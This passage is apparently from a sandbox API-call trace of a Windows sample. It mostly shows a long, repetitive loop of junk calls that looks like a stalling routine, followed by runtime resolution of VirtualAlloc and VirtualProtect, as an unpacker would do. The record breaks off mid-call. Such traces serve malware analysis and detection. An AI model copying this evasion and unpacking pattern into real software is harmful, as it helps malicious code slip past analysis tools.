lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.217] AddAtomA (lpString=0x0) returned 0x0 [0114.217] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.217] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.217] AddAtomA (lpString=0x0) returned 0x0 [0114.217] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.217] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.217] AddAtomA (lpString=0x0) returned 0x0 [0114.217] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.217] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.217] AddAtomA (lpString=0x0) returned 0x0 [0114.217] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.217] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.217] AddAtomA (lpString=0x0) returned 0x0 [0114.217] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.217] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.217] AddAtomA (lpString=0x0) returned 0x0 [0114.217] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.217] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.217] AddAtomA (lpString=0x0) returned 0x0 [0114.217] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.217] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.218] AddAtomA (lpString=0x0) returned 0x0 [0114.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.218] AddAtomA (lpString=0x0) returned 0x0 [0114.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.218] AddAtomA (lpString=0x0) returned 0x0 [0114.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.218] AddAtomA (lpString=0x0) returned 0x0 [0114.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.218] AddAtomA (lpString=0x0) returned 0x0 [0114.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.218] AddAtomA (lpString=0x0) returned 0x0 [0114.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.218] AddAtomA (lpString=0x0) returned 0x0 [0114.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.218] AddAtomA (lpString=0x0) returned 0x0 [0114.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.218] AddAtomA (lpString=0x0) returned 0x0 [0114.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.218] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.218] AddAtomA (lpString=0x0) returned 0x0 [0114.218] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.219] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.219] AddAtomA (lpString=0x0) returned 0x0 [0114.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.219] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.219] AddAtomA (lpString=0x0) returned 0x0 [0114.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.219] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.219] AddAtomA (lpString=0x0) returned 0x0 [0114.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.219] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.219] AddAtomA (lpString=0x0) returned 0x0 [0114.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.219] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.219] AddAtomA (lpString=0x0) returned 0x0 [0114.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.219] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.219] AddAtomA (lpString=0x0) returned 0x0 [0114.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.219] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.219] AddAtomA (lpString=0x0) returned 0x0 [0114.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.219] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.219] AddAtomA (lpString=0x0) returned 0x0 [0114.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.219] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.219] AddAtomA (lpString=0x0) returned 0x0 [0114.219] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.220] AddAtomA (lpString=0x0) returned 0x0 [0114.220] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.220] AddAtomA (lpString=0x0) returned 0x0 [0114.220] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.220] AddAtomA (lpString=0x0) returned 0x0 [0114.220] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.220] AddAtomA (lpString=0x0) returned 0x0 [0114.220] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.220] AddAtomA (lpString=0x0) returned 0x0 [0114.220] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.220] AddAtomA (lpString=0x0) returned 0x0 [0114.220] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.220] AddAtomA (lpString=0x0) returned 0x0 [0114.220] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.220] AddAtomA (lpString=0x0) returned 0x0 [0114.220] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.220] AddAtomA (lpString=0x0) returned 0x0 [0114.220] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.220] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.220] AddAtomA (lpString=0x0) returned 0x0 [0114.221] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.221] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.221] AddAtomA (lpString=0x0) returned 0x0 [0114.221] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.221] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.221] AddAtomA (lpString=0x0) returned 0x0 [0114.221] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.221] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.221] AddAtomA (lpString=0x0) returned 0x0 [0114.221] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.221] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.221] AddAtomA (lpString=0x0) returned 0x0 [0114.221] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.221] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.221] AddAtomA (lpString=0x0) returned 0x0 [0114.221] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.221] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.221] AddAtomA (lpString=0x0) returned 0x0 [0114.221] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.221] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.221] AddAtomA (lpString=0x0) returned 0x0 [0114.221] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.221] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.221] AddAtomA (lpString=0x0) returned 0x0 [0114.221] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.221] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.221] AddAtomA (lpString=0x0) returned 0x0 [0114.222] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.222] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.222] AddAtomA (lpString=0x0) returned 0x0 [0114.222] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.222] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.222] AddAtomA (lpString=0x0) returned 0x0 [0114.222] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.222] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.222] AddAtomA (lpString=0x0) returned 0x0 [0114.222] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.222] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.222] AddAtomA (lpString=0x0) returned 0x0 [0114.222] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.222] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.222] AddAtomA (lpString=0x0) returned 0x0 [0114.222] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.222] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.222] AddAtomA (lpString=0x0) returned 0x0 [0114.222] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.222] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.222] AddAtomA (lpString=0x0) returned 0x0 [0114.222] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.222] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.222] AddAtomA (lpString=0x0) returned 0x0 [0114.222] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.222] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.222] AddAtomA (lpString=0x0) returned 0x0 [0114.222] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.222] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.223] AddAtomA (lpString=0x0) returned 0x0 [0114.223] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.223] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.223] AddAtomA (lpString=0x0) returned 0x0 [0114.223] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.223] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.223] AddAtomA (lpString=0x0) returned 0x0 [0114.223] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.223] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.223] AddAtomA (lpString=0x0) returned 0x0 [0114.223] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.223] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.223] AddAtomA (lpString=0x0) returned 0x0 [0114.223] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.223] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.223] AddAtomA (lpString=0x0) returned 0x0 [0114.223] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.223] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.223] AddAtomA (lpString=0x0) returned 0x0 [0114.223] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.223] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.223] AddAtomA (lpString=0x0) returned 0x0 [0114.223] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.223] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.223] AddAtomA (lpString=0x0) returned 0x0 [0114.223] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.223] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.223] AddAtomA (lpString=0x0) returned 0x0 [0114.224] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.224] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.224] AddAtomA (lpString=0x0) returned 0x0 [0114.224] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.224] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.224] AddAtomA (lpString=0x0) returned 0x0 [0114.224] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.224] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.224] AddAtomA (lpString=0x0) returned 0x0 [0114.224] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.224] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.224] AddAtomA (lpString=0x0) returned 0x0 [0114.224] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.224] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.224] AddAtomA (lpString=0x0) returned 0x0 [0114.224] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.224] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.224] AddAtomA (lpString=0x0) returned 0x0 [0114.224] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.224] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.224] AddAtomA (lpString=0x0) returned 0x0 [0114.224] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.224] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.224] AddAtomA (lpString=0x0) returned 0x0 [0114.224] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.224] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.224] AddAtomA (lpString=0x0) returned 0x0 [0114.224] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.225] AddAtomA (lpString=0x0) returned 0x0 [0114.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.225] AddAtomA (lpString=0x0) returned 0x0 [0114.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.225] AddAtomA (lpString=0x0) returned 0x0 [0114.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.225] AddAtomA (lpString=0x0) returned 0x0 [0114.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.225] AddAtomA (lpString=0x0) returned 0x0 [0114.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.225] AddAtomA (lpString=0x0) returned 0x0 [0114.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.225] AddAtomA (lpString=0x0) returned 0x0 [0114.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.225] AddAtomA (lpString=0x0) returned 0x0 [0114.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.225] AddAtomA (lpString=0x0) returned 0x0 [0114.225] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.225] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.226] AddAtomA (lpString=0x0) returned 0x0 [0114.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.226] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.226] AddAtomA (lpString=0x0) returned 0x0 [0114.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.226] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.226] AddAtomA (lpString=0x0) returned 0x0 [0114.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.226] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.226] AddAtomA (lpString=0x0) returned 0x0 [0114.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.226] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.226] AddAtomA (lpString=0x0) returned 0x0 [0114.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.226] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.226] AddAtomA (lpString=0x0) returned 0x0 [0114.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.226] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.226] AddAtomA (lpString=0x0) returned 0x0 [0114.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.226] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.226] AddAtomA (lpString=0x0) returned 0x0 [0114.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.226] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.226] AddAtomA (lpString=0x0) returned 0x0 [0114.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.226] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.226] AddAtomA (lpString=0x0) returned 0x0 [0114.226] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.227] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.227] AddAtomA (lpString=0x0) returned 0x0 [0114.227] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.227] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.227] AddAtomA (lpString=0x0) returned 0x0 [0114.227] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.227] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.227] AddAtomA (lpString=0x0) returned 0x0 [0114.227] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.227] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.227] AddAtomA (lpString=0x0) returned 0x0 [0114.227] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.227] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.227] AddAtomA (lpString=0x0) returned 0x0 [0114.227] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.227] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.227] AddAtomA (lpString=0x0) returned 0x0 [0114.227] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.227] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.227] AddAtomA (lpString=0x0) returned 0x0 [0114.227] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.227] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.227] AddAtomA (lpString=0x0) returned 0x0 [0114.227] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.227] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.227] AddAtomA (lpString=0x0) returned 0x0 [0114.227] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.228] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.228] AddAtomA (lpString=0x0) returned 0x0 [0114.228] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.228] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.228] AddAtomA (lpString=0x0) returned 0x0 [0114.228] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.228] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.228] AddAtomA (lpString=0x0) returned 0x0 [0114.228] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.228] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.228] AddAtomA (lpString=0x0) returned 0x0 [0114.228] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.228] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.228] AddAtomA (lpString=0x0) returned 0x0 [0114.228] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.228] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.228] AddAtomA (lpString=0x0) returned 0x0 [0114.228] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.228] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.228] AddAtomA (lpString=0x0) returned 0x0 [0114.228] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.228] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.228] AddAtomA (lpString=0x0) returned 0x0 [0114.228] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.228] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.229] AddAtomA (lpString=0x0) returned 0x0 [0114.229] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.229] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.261] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0114.262] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0114.262] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0114.262] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0114.262] GetProcAddress (hModule=0x76d30000, 